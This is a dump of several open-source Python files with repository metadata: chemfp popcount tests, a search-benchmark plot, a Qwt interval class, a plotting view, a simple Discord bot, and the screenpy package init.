changeFloodDirection("./Tension1", True) | 20.734043 | 79 | 0.644433 | 207 | 1,949 | 5.94686 | 0.386473 | 0.071487 | 0.028432 | 0.042242 | 0.058489 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00336 | 0.236532 | 1,949 | 94 | 80 | 20.734043 | 0.823925 | 0.169831 | 0 | 0 | 0 | 0 | 0.157928 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.026316 | false | 0 | 0.236842 | 0 | 0.263158 | 0.052632 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8b3c3115ab976f05caa295d2b7c1ec8bd35c689 | 10,247 | py | Python | tests/test_methods.py | flc/chem-fingerprints | 8c1b27374355f08105c5332db376b3428b6e30b2 | [
"MIT"
] | null | null | null | tests/test_methods.py | flc/chem-fingerprints | 8c1b27374355f08105c5332db376b3428b6e30b2 | [
"MIT"
] | null | null | null | tests/test_methods.py | flc/chem-fingerprints | 8c1b27374355f08105c5332db376b3428b6e30b2 | [
"MIT"
] | null | null | null | from __future__ import absolute_import, with_statement
import unittest2
from support import fullpath
import chemfp
import chemfp.bitops
import _chemfp
set_alignment_method = chemfp.bitops.set_alignment_method
get_alignment_method = chemfp.bitops.get_alignment_method
CHEBI_TARGETS = fullpath("chebi_rdmaccs.fps")
CHEBI_QUERIES = fullpath("chebi_queries.fps.gz")
targets = chemfp.load_fingerprints(CHEBI_TARGETS, alignment=8)
targets_64 = chemfp.load_fingerprints(CHEBI_TARGETS, alignment=64)
available_methods = chemfp.bitops.get_methods()
alignment_methods = chemfp.bitops.get_alignment_methods()
all_methods = dict.fromkeys("LUT8-1 LUT8-4 LUT16-4 Lauradoux POPCNT Gillies ssse3".split())
class TestMethods(unittest2.TestCase):
def test_no_duplicates(self):
methods = chemfp.bitops.get_methods()
self.assertEquals(len(methods), len(set(methods)))
def test_for_unknown_methods(self):
for method in chemfp.bitops.get_methods():
self.assertIn(method, all_methods)
def test_for_possible_missing_popcnt(self):
if len(all_methods) == 4:
            self.assertNotIn("POPCNT", chemfp.bitops.get_methods())
def test_internal_bad_args(self):
with self.assertRaisesRegexp(IndexError, "method index is out of range"):
_chemfp.get_method_name(-1)
with self.assertRaisesRegexp(IndexError, "method index is out of range"):
_chemfp.get_method_name(_chemfp.get_num_methods())
all_alignments = dict.fromkeys("align1 align4 align8-small align8-large align-ssse3".split())
class TestAlignments(unittest2.TestCase):
def test_no_duplicates(self):
alignments = chemfp.bitops.get_alignments()
self.assertEquals(len(alignments), len(set(alignments)))
self.assertEquals(len(alignments), len(all_alignments))
def test_for_unknown_alignments(self):
for alignment in chemfp.bitops.get_alignments():
self.assertIn(alignment, all_alignments)
def test_get_set_alignment_method(self):
for alignment in chemfp.bitops.get_alignments():
method = get_alignment_method(alignment)
self.assertIn(method, all_methods)
set_alignment_method(alignment, "LUT8-1")
self.assertEqual(get_alignment_method(alignment), "LUT8-1")
set_alignment_method(alignment, method)
self.assertEqual(get_alignment_method(alignment), method)
def test_internal_bad_args(self):
with self.assertRaisesRegexp(IndexError, "alignment index is out of range"):
_chemfp.get_alignment_name(-1)
with self.assertRaisesRegexp(IndexError, "alignment index is out of range"):
_chemfp.get_alignment_name(_chemfp.get_num_methods())
# I didn't want a better error code for this
with self.assertRaisesRegexp(ValueError, "Bad argument"):
_chemfp.get_alignment_name(_chemfp.get_alignment_method(-1))
with self.assertRaisesRegexp(ValueError, "Bad argument"):
_chemfp.get_alignment_name(_chemfp.get_alignment_method(100))
with self.assertRaisesRegexp(ValueError, "Bad argument"):
_chemfp.get_alignment_name(_chemfp.set_alignment_method(-1, 0))
with self.assertRaisesRegexp(ValueError, "Bad argument"):
_chemfp.get_alignment_name(_chemfp.set_alignment_method(100, 0))
def test_cannot_use_64_bit_method_for_shorter_bit_alignment(self):
msg = "Mismatch between popcount method and alignment type"
available_methods = chemfp.bitops.get_methods()
for method in ("Lauradoux", "Gillies", "POPCNT"):
if (method == "POPCNT") and ("POPCNT" not in available_methods):
continue
with self.assertRaisesRegexp(ValueError, msg):
set_alignment_method("align1", method)
with self.assertRaisesRegexp(ValueError, msg):
set_alignment_method("align4", method)
@unittest2.skipIf("ssse3" not in available_methods, "CPU does not implement SSSE3")
def test_ssse3(self):
method = get_alignment_method("align-ssse3")
# This disables SSSE3 support
set_alignment_method("align-ssse3", "LUT8-1")
self.assertEquals(get_alignment_method("align-ssse3"), "LUT8-1")
set_alignment_method("align-ssse3", "ssse3")
self.assertEquals(get_alignment_method("align-ssse3"), "ssse3")
set_alignment_method("align-ssse3", method)
class TestAlign8SmallMethods(unittest2.TestCase):
def setUp(self):
self.small_method = get_alignment_method("align8-small")
self.large_method = get_alignment_method("align8-large")
self.ssse3_method = get_alignment_method("align-ssse3")
def tearDown(self):
set_alignment_method("align8-small", self.small_method)
set_alignment_method("align8-large", self.large_method)
set_alignment_method("align-ssse3", self.ssse3_method)
def _doit(self, method):
for alignment in ("align8-small", "align8-large", "align-ssse3"):
set_alignment_method(alignment, method)
self.assertEquals(get_alignment_method(alignment), method)
hits = targets.id_knearest_tanimoto_search_fp("00000000100410200290000b03a29241846163ee1f".decode("hex"), k=12, threshold=0.2)
self.assertEqual(hits, [('CHEBI:8069', 1.0),
('CHEBI:6758', 0.78723404255319152),
('CHEBI:7983', 0.73999999999999999),
('CHEBI:8107', 0.6956521739130435),
('CHEBI:17568', 0.6904761904761905),
('CHEBI:16294', 0.6818181818181818),
('CHEBI:16964', 0.673469387755102),
('CHEBI:17477', 0.6458333333333334),
('CHEBI:17025', 0.62),
('CHEBI:15901', 0.6122448979591837),
('CHEBI:16742', 0.6122448979591837),
('CHEBI:4888', 0.6078431372549019)])
def test_lut8_1(self):
self._doit("LUT8-1")
def test_lut8_4(self):
self._doit("LUT8-4")
def test_lut16_4(self):
self._doit("LUT16-4")
def test_lauradoux(self):
with self.assertRaisesRegexp(ValueError, "Mismatch between popcount method and alignment type"):
set_alignment_method("align8-small", "Lauradoux")
@unittest2.skipIf("POPCNT" not in alignment_methods, "CPU does not implement POPCNT")
def test_popcnt(self):
self._doit("POPCNT")
class TestAlign8LargeMethods(unittest2.TestCase):
def setUp(self):
self.large_method = get_alignment_method("align8-large")
self.ssse3_method = get_alignment_method("align-ssse3")
def tearDown(self):
set_alignment_method("align8-large", self.large_method)
set_alignment_method("align-ssse3", self.ssse3_method)
def _doit(self, method, use_ssse3=False):
set_alignment_method("align8-large", method)
self.assertEquals(get_alignment_method("align8-large"), method)
if use_ssse3:
set_alignment_method("align-ssse3", "ssse3")
self.assertEquals(get_alignment_method("align-ssse3"), "ssse3")
else:
set_alignment_method("align-ssse3", "LUT8-1")
self.assertEquals(get_alignment_method("align-ssse3"), "LUT8-1")
hits = targets_64.id_knearest_tanimoto_search_fp("00000000100410200290000b03a29241846163ee1f".decode("hex"), k=12, threshold=0.2)
self.assertEqual(hits, [('CHEBI:8069', 1.0),
('CHEBI:6758', 0.78723404255319152),
('CHEBI:7983', 0.73999999999999999),
('CHEBI:8107', 0.6956521739130435),
('CHEBI:17568', 0.6904761904761905),
('CHEBI:16294', 0.6818181818181818),
('CHEBI:16964', 0.673469387755102),
('CHEBI:17477', 0.6458333333333334),
('CHEBI:17025', 0.62),
('CHEBI:15901', 0.6122448979591837),
('CHEBI:16742', 0.6122448979591837),
('CHEBI:4888', 0.6078431372549019)])
def test_lut8_1(self):
self._doit("LUT8-1")
def test_lut8_4(self):
self._doit("LUT8-4")
def test_lut16_4(self):
self._doit("LUT16-4")
def test_lauradoux(self):
self._doit("Lauradoux")
def test_gillies(self):
self._doit("Gillies")
@unittest2.skipIf("ssse3" not in available_methods, "CPU does not implement SSSE3")
def test_ssse3(self):
self._doit("Lauradoux", use_ssse3=True)
@unittest2.skipIf("POPCNT" not in available_methods, "CPU does not implement POPCNT")
def test_popcnt(self):
self._doit("POPCNT")
class TestSelectFastestMethod(unittest2.TestCase):
def setUp(self):
self._alignment_methods = chemfp.bitops.get_alignment_methods()
def tearDown(self):
for k,v in self._alignment_methods.items():
set_alignment_method(k, v)
def test_select_fastest(self):
for alignment in all_alignments:
set_alignment_method(alignment, "LUT8-1")
self.assertEquals(get_alignment_method(alignment), "LUT8-1")
chemfp.bitops.select_fastest_method()
best_methods1 = chemfp.bitops.get_alignment_methods()
for alignment in all_alignments:
set_alignment_method(alignment, "LUT8-1")
self.assertEquals(get_alignment_method(alignment), "LUT8-1")
chemfp.bitops.select_fastest_method()
best_methods2 = chemfp.bitops.get_alignment_methods()
self.assertEquals(best_methods1, best_methods2) # This might fail if two methods have nearly identical timings
chemfp.bitops.select_fastest_method(repeat=-1000)
if __name__ == "__main__":
chemfp.bitops.use_environment_variables()
unittest2.main()
| 42.342975 | 137 | 0.645164 | 1,127 | 10,247 | 5.612245 | 0.15173 | 0.118577 | 0.071146 | 0.055336 | 0.759209 | 0.686957 | 0.573597 | 0.526166 | 0.492332 | 0.492332 | 0 | 0.090177 | 0.248951 | 10,247 | 241 | 138 | 42.518672 | 0.731679 | 0.012784 | 0 | 0.540984 | 0 | 0 | 0.139339 | 0.008307 | 0 | 0 | 0 | 0 | 0.169399 | 1 | 0.169399 | false | 0 | 0.032787 | 0 | 0.229508 | 0.010929 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8b56884859b12e855992f80015331be2b6ea620 | 1,832 | py | Python | knowledgerep/Assignment1/plots/plot_uninformed_hist.py | bhattacharjee/aima-python | 61a3bd8000678f3a87e6c101970c46f02893943f | [
"MIT"
] | null | null | null | knowledgerep/Assignment1/plots/plot_uninformed_hist.py | bhattacharjee/aima-python | 61a3bd8000678f3a87e6c101970c46f02893943f | [
"MIT"
] | null | null | null | knowledgerep/Assignment1/plots/plot_uninformed_hist.py | bhattacharjee/aima-python | 61a3bd8000678f3a87e6c101970c46f02893943f | [
"MIT"
] | null | null | null | #!/usr/bin/python3
import matplotlib.pyplot as plt
from matplotlib.ticker import NullFormatter
fig, ax = plt.subplots(2, 2)
print(ax, type(ax), len(ax))
x = [10.09950494, 16.43167673, 27.03701167]
x1 = [10.09950494, 27.03701167]
ax[0][0].set(title="nSteps", xlabel="sqrt(n_squares)", ylabel="nSteps")
y1 = [33, 110, 327]
ax[0][0].plot(x, y1, label="DFS with Length", color="blue", marker='o')
y1 = [15, 36, 53]
ax[0][0].plot(x, y1, label="BFS with Length", color="red", marker='o')
y1 = [15, 53, ]
ax[0][0].plot(x1, y1, label="UCS with Length", color="green", marker='o')
ax[0][0].set_ylim(bottom=0)
ax[0][0].legend()
ax[0][1].set(title="Successors", xlabel="sqrt(n_squares)", ylabel="Successors")
y1 = [45, 115, 404, ]
ax[0][1].plot(x, y1, label="DFS with Length", color="blue", marker='o')
y1 = [283, 219557, 227716, ]
ax[0][1].plot(x, y1, label="BFS with Length", color="red", marker='o')
y1 = [377, 231030]
ax[0][1].plot(x1, y1, label="UCS with Length", color="green", marker='o')
ax[1][0].set(title="Search Time", xlabel="sqrt(n_squares)", ylabel="Search Time (s)")
y1 = [0.064, 0.413, 2.116, ]
ax[1][0].plot(x, y1, label="DFS with Length", color="blue", marker='o')
y1 = [0.276, 2584.57, 2691.58, ]
ax[1][0].plot(x, y1, label="BFS with Length", color="red", marker='o')
y1 = [0.3912, 4681.72812]
ax[1][0].plot(x1, y1, label="UCS with Length", color="green", marker='o')
ax[1][1].set(title="Memory", xlabel="sqrt(n_squares)", ylabel="MB")
y1 = [66.48, 66.41, 67.6, ]
ax[1][1].plot(x, y1, label="DFS with Length", color="blue", marker='o')
y1 = [66.45, 309.58, 471.43, ]
ax[1][1].plot(x, y1, label="BFS with Length", color="red", marker='o')
y1 = [66.59, 476.1796875]
ax[1][1].plot(x1, y1, label="UCS with Length", color="green", marker='o')
fig.suptitle("Uninformed Search\n(Body length/history included)")
plt.show()
| 37.387755 | 85 | 0.635917 | 338 | 1,832 | 3.431953 | 0.298817 | 0.072414 | 0.155172 | 0.082759 | 0.568103 | 0.47931 | 0.47931 | 0.458621 | 0.458621 | 0.458621 | 0 | 0.153563 | 0.111354 | 1,832 | 48 | 86 | 38.166667 | 0.558968 | 0.009279 | 0 | 0 | 0 | 0 | 0.228776 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.052632 | 0 | 0.052632 | 0.026316 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8b7b73c2d804287f3a44881ed33d9604b0a44f4 | 12,074 | py | Python | Lib/site-packages/qwt/interval.py | fochoao/cpython | 3dc84b260e5bced65ebc2c45c40c8fa65f9b5aa9 | [
"bzip2-1.0.6",
"0BSD"
] | null | null | null | Lib/site-packages/qwt/interval.py | fochoao/cpython | 3dc84b260e5bced65ebc2c45c40c8fa65f9b5aa9 | [
"bzip2-1.0.6",
"0BSD"
] | 20 | 2021-05-03T18:02:23.000Z | 2022-03-12T12:01:04.000Z | Lib/site-packages/qwt/interval.py | fochoao/cpython | 3dc84b260e5bced65ebc2c45c40c8fa65f9b5aa9 | [
"bzip2-1.0.6",
"0BSD"
] | null | null | null | # -*- coding: utf-8 -*-
#
# Licensed under the terms of the Qwt License
# Copyright (c) 2002 Uwe Rathmann, for the original C++ code
# Copyright (c) 2015 Pierre Raybaut, for the Python translation/optimization
# (see LICENSE file for more details)
"""
QwtInterval
-----------
.. autoclass:: QwtInterval
:members:
"""
class QwtInterval(object):
"""
A class representing an interval
The interval is represented by 2 doubles, the lower and the upper limit.
.. py:class:: QwtInterval(minValue=0., maxValue=-1., borderFlags=None)
Build an interval with from min/max values
:param float minValue: Minimum value
:param float maxValue: Maximum value
:param int borderFlags: Include/Exclude borders
"""
# enum BorderFlag
IncludeBorders = 0x00
ExcludeMinimum = 0x01
ExcludeMaximum = 0x02
ExcludeBorders = ExcludeMinimum | ExcludeMaximum
def __init__(self, minValue=0.0, maxValue=-1.0, borderFlags=None):
assert not isinstance(minValue, QwtInterval)
assert not isinstance(maxValue, QwtInterval)
self.__minValue = None
self.__maxValue = None
self.__borderFlags = None
self.setInterval(minValue, maxValue, borderFlags)
def setInterval(self, minValue, maxValue, borderFlags=None):
"""
Assign the limits of the interval
:param float minValue: Minimum value
:param float maxValue: Maximum value
:param int borderFlags: Include/Exclude borders
"""
self.__minValue = float(minValue) # avoid overflows with NumPy scalars
self.__maxValue = float(maxValue) # avoid overflows with NumPy scalars
if borderFlags is None:
self.__borderFlags = self.IncludeBorders
else:
self.__borderFlags = borderFlags
def setBorderFlags(self, borderFlags):
"""
Change the border flags
:param int borderFlags: Include/Exclude borders
.. seealso::
:py:meth:`borderFlags()`
"""
self.__borderFlags = borderFlags
def borderFlags(self):
"""
:return: Border flags
.. seealso::
:py:meth:`setBorderFlags()`
"""
return self.__borderFlags
def setMinValue(self, minValue):
"""
Assign the lower limit of the interval
:param float minValue: Minimum value
"""
self.__minValue = float(minValue) # avoid overflows with NumPy scalars
def setMaxValue(self, maxValue):
"""
Assign the upper limit of the interval
:param float maxValue: Maximum value
"""
self.__maxValue = float(maxValue) # avoid overflows with NumPy scalars
def minValue(self):
"""
:return: Lower limit of the interval
"""
return self.__minValue
def maxValue(self):
"""
:return: Upper limit of the interval
"""
return self.__maxValue
def isValid(self):
"""
A interval is valid when minValue() <= maxValue().
In case of `QwtInterval.ExcludeBorders` it is true
when minValue() < maxValue()
:return: True, when the interval is valid
"""
if (self.__borderFlags & self.ExcludeBorders) == 0:
return self.__minValue <= self.__maxValue
else:
return self.__minValue < self.__maxValue
def width(self):
"""
The width of invalid intervals is 0.0, otherwise the result is
maxValue() - minValue().
:return: the width of an interval
"""
if self.isValid():
return self.__maxValue - self.__minValue
else:
return 0.0
def __and__(self, other):
return self.intersect(other)
def __iand__(self, other):
self = self & other
return self
def __or__(self, other):
if isinstance(other, QwtInterval):
return self.unite(other)
else:
return self.extend(other)
def __ior__(self, other):
self = self | other
return self
def __eq__(self, other):
return (
self.__minValue == other.__minValue
and self.__maxValue == other.__maxValue
and self.__borderFlags == other.__borderFlags
)
def __ne__(self, other):
return not self.__eq__(other)
def isNull(self):
"""
:return: true, if isValid() && (minValue() >= maxValue())
"""
return self.isValid() and self.__minValue >= self.__maxValue
def invalidate(self):
"""
The limits are set to interval [0.0, -1.0]
.. seealso::
:py:meth:`isValid()`
"""
self.__minValue = 0.0
self.__maxValue = -1.0
def normalized(self):
"""
Normalize the limits of the interval
If maxValue() < minValue() the limits will be inverted.
:return: Normalized interval
.. seealso::
:py:meth:`isValid()`, :py:meth:`inverted()`
"""
if self.__minValue > self.__maxValue:
return self.inverted()
elif (
self.__minValue == self.__maxValue
and self.__borderFlags == self.ExcludeMinimum
):
return self.inverted()
else:
return self
def inverted(self):
"""
Invert the limits of the interval
:return: Inverted interval
.. seealso::
:py:meth:`normalized()`
"""
borderFlags = self.IncludeBorders
if self.__borderFlags & self.ExcludeMinimum:
borderFlags |= self.ExcludeMaximum
if self.__borderFlags & self.ExcludeMaximum:
borderFlags |= self.ExcludeMinimum
return QwtInterval(self.__maxValue, self.__minValue, borderFlags)
def contains(self, value):
"""
Test if a value is inside an interval
:param float value: Value
:return: true, if value >= minValue() && value <= maxValue()
"""
if not self.isValid():
return False
elif value < self.__minValue or value > self.__maxValue:
return False
elif value == self.__minValue and self.__borderFlags & self.ExcludeMinimum:
return False
elif value == self.__maxValue and self.__borderFlags & self.ExcludeMaximum:
return False
else:
return True
def unite(self, other):
"""
Unite two intervals
:param qwt.interval.QwtInterval other: other interval to united with
:return: united interval
"""
if not self.isValid():
if not other.isValid():
return QwtInterval()
else:
return other
elif not other.isValid():
return self
united = QwtInterval()
flags = self.IncludeBorders
# minimum
if self.__minValue < other.minValue():
united.setMinValue(self.__minValue)
flags &= self.__borderFlags & self.ExcludeMinimum
elif other.minValue() < self.__minValue:
united.setMinValue(other.minValue())
flags &= other.borderFlags() & self.ExcludeMinimum
else:
united.setMinValue(self.__minValue)
flags &= (self.__borderFlags & other.borderFlags()) & self.ExcludeMinimum
# maximum
if self.__maxValue > other.maxValue():
united.setMaxValue(self.__maxValue)
flags &= self.__borderFlags & self.ExcludeMaximum
elif other.maxValue() > self.__maxValue:
united.setMaxValue(other.maxValue())
flags &= other.borderFlags() & self.ExcludeMaximum
else:
united.setMaxValue(self.__maxValue)
flags &= self.__borderFlags & other.borderFlags() & self.ExcludeMaximum
united.setBorderFlags(flags)
return united
def intersect(self, other):
"""
Intersect two intervals
:param qwt.interval.QwtInterval other: other interval to intersect with
:return: intersected interval
"""
if not other.isValid() or not self.isValid():
return QwtInterval()
i1 = self
i2 = other
if i1.minValue() > i2.minValue():
i1, i2 = i2, i1
elif i1.minValue() == i2.minValue():
if i1.borderFlags() & self.ExcludeMinimum:
i1, i2 = i2, i1
if i1.maxValue() < i2.maxValue():
return QwtInterval()
if i1.maxValue() == i2.minValue():
if (
i1.borderFlags() & self.ExcludeMaximum
or i2.borderFlags() & self.ExcludeMinimum
):
return QwtInterval()
intersected = QwtInterval()
flags = self.IncludeBorders
intersected.setMinValue(i2.minValue())
flags |= i2.borderFlags() & self.ExcludeMinimum
if i1.maxValue() < i2.maxValue():
intersected.setMaxValue(i1.maxValue())
flags |= i1.borderFlags() & self.ExcludeMaximum
elif i2.maxValue() < i1.maxValue():
intersected.setMaxValue(i2.maxValue())
flags |= i2.borderFlags() & self.ExcludeMaximum
else: # i1.maxValue() == i2.maxValue()
intersected.setMaxValue(i1.maxValue())
flags |= i1.borderFlags() & i2.borderFlags() & self.ExcludeMaximum
intersected.setBorderFlags(flags)
return intersected
def intersects(self, other):
"""
Test if two intervals overlap
:param qwt.interval.QwtInterval other: other interval
:return: True, when the intervals are intersecting
"""
if not other.isValid() or not self.isValid():
return False
i1 = self
i2 = other
if i1.minValue() > i2.minValue():
i1, i2 = i2, i1
elif i1.minValue() == i2.minValue() and i1.borderFlags() & self.ExcludeMinimum:
i1, i2 = i2, i1
if i1.maxValue() > i2.minValue():
return True
elif i1.maxValue() == i2.minValue():
return (
i1.borderFlags() & self.ExcludeMaximum
and i2.borderFlags() & self.ExcludeMinimum
)
return False
def symmetrize(self, value):
"""
Adjust the limit that is closer to value, so that value becomes
the center of the interval.
:param float value: Center
:return: Interval with value as center
"""
if not self.isValid():
return self
delta = max([abs(value - self.__maxValue), abs(value - self.__minValue)])
return QwtInterval(value - delta, value + delta)
def limited(self, lowerBound, upperBound):
"""
Limit the interval, keeping the border modes
:param float lowerBound: Lower limit
:param float upperBound: Upper limit
:return: Limited interval
"""
if not self.isValid() or lowerBound > upperBound:
return QwtInterval()
minValue = max([self.__minValue, lowerBound])
minValue = min([minValue, upperBound])
maxValue = max([self.__maxValue, lowerBound])
maxValue = min([maxValue, upperBound])
return QwtInterval(minValue, maxValue, self.__borderFlags)
def extend(self, value):
"""
Extend the interval
If value is below minValue(), value becomes the lower limit.
If value is above maxValue(), value becomes the upper limit.
extend() has no effect for invalid intervals
:param float value: Value
:return: extended interval
"""
if not self.isValid():
return self
return QwtInterval(min([value, self.__minValue]), max([value, self.__maxValue]))
| 30.185 | 88 | 0.574292 | 1,185 | 12,074 | 5.716456 | 0.140928 | 0.062002 | 0.051373 | 0.017715 | 0.348686 | 0.267936 | 0.201211 | 0.165633 | 0.147033 | 0.103041 | 0 | 0.011757 | 0.330793 | 12,074 | 399 | 89 | 30.260652 | 0.826609 | 0.268262 | 0 | 0.359375 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001537 | 0 | 0.010417 | 1 | 0.140625 | false | 0 | 0 | 0.015625 | 0.385417 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8b7bb628a6a7b8d2e574583f0e3bb6818cbf97d | 890 | py | Python | scgv/views/error.py | lchorbadjiev/SCGV | 7b2fd1fbada7bea49166e37bcb82bd742617fe51 | [
"MIT"
] | 8 | 2017-03-31T19:55:36.000Z | 2021-01-22T09:11:40.000Z | scgv/views/error.py | lchorbadjiev/SCGV | 7b2fd1fbada7bea49166e37bcb82bd742617fe51 | [
"MIT"
] | null | null | null | scgv/views/error.py | lchorbadjiev/SCGV | 7b2fd1fbada7bea49166e37bcb82bd742617fe51 | [
"MIT"
] | 2 | 2019-06-11T09:07:01.000Z | 2020-09-25T02:30:22.000Z | '''
Created on Dec 21, 2016
@author: lubo
'''
# from matplotlib import cm
import matplotlib.pyplot as plt
from scgv.views.base import ViewerBase
class ErrorViewer(ViewerBase):
NORMALIZE_ERROR_MIN = 0
NORMALIZE_ERROR_MAX = 50
def __init__(self, model):
super(ErrorViewer, self).__init__(model)
def draw_error(self, ax):
if self.model.error is not None:
ax.imshow(
[self.model.error],
aspect='auto',
interpolation='nearest',
# cmap=cm.coolwarm, # @UndefinedVariable
cmap=plt.get_cmap('Greys'),
# vmin=self.NORMALIZE_ERROR_MIN,
# vmax=self.NORMALIZE_ERROR_MAX,
extent=self.model.bar_extent)
ax.set_xticks([])
ax.set_xticklabels([])
ax.set_yticks([0.5])
ax.set_yticklabels(["Error"])
| 26.969697 | 57 | 0.585393 | 102 | 890 | 4.882353 | 0.558824 | 0.11245 | 0.068273 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017771 | 0.304494 | 890 | 32 | 58 | 27.8125 | 0.786753 | 0.186517 | 0 | 0 | 0 | 0 | 0.029494 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.105263 | false | 0 | 0.105263 | 0 | 0.368421 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8b7c360408bbe93d3e1ff73abf1d6e934ab7b5e | 3,106 | py | Python | bot.py | arefmalek/freebobby | 0cbf290caaaca4df98171791113f6dd5d2aa78b4 | [
"MIT"
] | null | null | null | bot.py | arefmalek/freebobby | 0cbf290caaaca4df98171791113f6dd5d2aa78b4 | [
"MIT"
] | null | null | null | bot.py | arefmalek/freebobby | 0cbf290caaaca4df98171791113f6dd5d2aa78b4 | [
"MIT"
] | null | null | null | import discord
import os
import json
import numpy as np
import reddit_functions as rf
import billboard_functions as bf
import st
import activities as act
import bucketlist as bl  # assumed module name: 'bl.bucketRandom()' is called below but 'bl' was never imported
with open("keys.json") as f:
info = json.load(f)
headers = ['Task', 'Start', 'End']
todolist = np.empty(shape=[0,3])
client = discord.Client()
@client.event
async def on_ready():
print('We have logged in as {0.user}'.format(client))
@client.event
async def on_message(message):
if message.author == client.user:
return
#good news subreddit
if message.content.startswith('!goodnews'):
news, link = rf.good_news()
await message.channel.send("Here's some good news\n\n" +
news + "\n" + link)
#gives movie game or TV show
elif message.content.startswith('!activity '):
answer = ""
genre = message.content.split(' ')
if len(genre) > 0:
genre = genre[1]
if genre == "game":
answer = act.game()
if genre == "TV":
answer = act.television()
if genre == "movie":
answer = act.movie()
await message.channel.send(answer)
return
elif message.content.startswith('!song'):
charts = bf.random_queue()
await message.channel.send(charts)
elif message.content.startswith('!today'):
embedVar = discord.Embed(title="Daily Dashboard", description=" ", color=discord.Color.teal())
rlink = rf.dailypic().url
embedVar.set_thumbnail(url=rlink)
embedVar.add_field(name='Post of the Day', value=rlink, inline=False)
embedVar.add_field(name="Music's Top 5", value=bf.top_five(), inline=False)
embedVar.add_field(name="Self Care Tip of the Day", value=bl.bucketRandom(), inline=False)
embedVar.set_footer(text='Source: https://wholefully.com/self-care-ideas/')
await message.channel.send(embed=embedVar)
elif st.contains(message.content)[0]:
info = st.contains(message.content)
await message.channel.send(st.are_you_okay(info[1]))
###Calendar/To Do List
elif message.content.startswith('!addtask'):
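# expected message format (assumed): !addtask <task> <start> <end>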
global todolist
args = message.content.split(' ')
task = args[1]
start = args[2]
end = args[3]
item = np.array([task, start, end])
todolist = np.append(todolist, [item], axis=0)
todolist = todolist[todolist[:, 1].argsort()]
print(todolist)
await message.channel.send('Task added')
elif message.content.startswith('!todo'):
await message.channel.send(headers)
for item in todolist:
await message.channel.send(item)
elif message.content.startswith('!done'):
args = message.content.split(' ')[1]
for item in range(len(todolist)):
if args == todolist[item][0]:
await message.channel.send("Congrats on finishing " + args + "!")
todolist = np.delete(todolist, item, axis=0)
client.run(info["discord"]["discord_token"]) | 27.732143 | 102 | 0.602382 | 381 | 3,106 | 4.871391 | 0.383202 | 0.090517 | 0.092134 | 0.11153 | 0.119612 | 0.0625 | 0 | 0 | 0 | 0 | 0 | 0.007014 | 0.265615 | 3,106 | 112 | 103 | 27.732143 | 0.806664 | 0.020927 | 0 | 0.054054 | 0 | 0 | 0.101087 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.108108 | 0 | 0.135135 | 0.027027 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8b7f32507663d90e0ff10ef753ae015dfc6bc18 | 1,044 | py | Python | screenpy/__init__.py | ScreenPyHQ/screenpy | e5eb9873f0eb8987a88c7b51a273c55925801738 | [
"MIT"
] | 8 | 2022-02-23T18:40:13.000Z | 2022-03-20T06:27:30.000Z | screenpy/__init__.py | ScreenPyHQ/screenpy | e5eb9873f0eb8987a88c7b51a273c55925801738 | [
"MIT"
] | 7 | 2022-01-13T07:01:40.000Z | 2022-03-31T15:45:13.000Z | screenpy/__init__.py | ScreenPyHQ/screenpy | e5eb9873f0eb8987a88c7b51a273c55925801738 | [
"MIT"
] | 2 | 2022-01-16T09:03:19.000Z | 2022-01-16T09:06:10.000Z | # -*- coding: utf-8 -*-
# ____ ____
# / ___| ___ _ __ ___ ___ _ __ | _ \ _ _
# \___ \ / __| '__/ _ \/ _ \ '_ \| |_) | | | |
# ___) | (__| | | __/ __/ | | | __/| |_| |
# |____/ \___|_| \___|\___|_| |_|_| \__, |
# |___/
"""
ScreenPy
FADE IN:
INT. SITEPACKAGES DIRECTORY
ScreenPy is a composition-based test framework. It is inspired by the
SerenityBDD library for Java.
:copyright: (c) 2019–2022 by Perry Goy.
:license: MIT, see LICENSE for more details.
"""
from .actor import Actor
from .director import Director
from .given_when_then import and_, given, given_that, then, when
# Natural-language-enabling syntactic sugar
AnActor = Actor
__all__ = [
"Actor",
"AnActor",
"Director",
"and_",
"given",
"given_that",
"then",
"when",
]
